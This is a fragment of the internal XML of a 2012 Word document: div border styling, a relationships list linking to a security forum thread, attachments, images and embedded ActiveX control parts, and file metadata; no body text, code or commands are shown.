                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="208333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109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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="137311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622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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="74005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6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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="41386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90sec.org/attachment.php?aid=NTM3NHwxM2Y2NzY3NnwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM4M3wzYTViYjNmNHwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=y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orum.90sec.org/attachment.php?aid=NTM3NnwxYTUxNDlmM3wxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId42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forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM3OHxkZjE5Mzc3ZHwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM4MHw5ODFmYjQ0NnwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html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control" Target="activeX/activeX1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM4MnwyNjU3MmI0OXwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/sethc5/blog" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hi.baidu.com/sethc5/blog" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX2.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM3N3wxNGU5Yjg2ZHwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.wmf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM3NXw0M2NjNWNlM3wxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=yes" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM3OXw2MzA4OGU2NnwxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=y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um.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/thread-3616-1-4.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX3.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.90sec.org/attachment.php?aid=NTM4MXw1YjhmYjNjM3wxMzUyOTk5NjU2fDk2MzlHQW52OVBjUVJTODNUcXkzZS9VVGlndlNWZjV4bTBkazZaRTh4NlZsbXRJ&amp;nothumb=ye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880</Words>
  <Characters>5020</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>41</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5889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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>g4</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-15T17:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-15T17:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>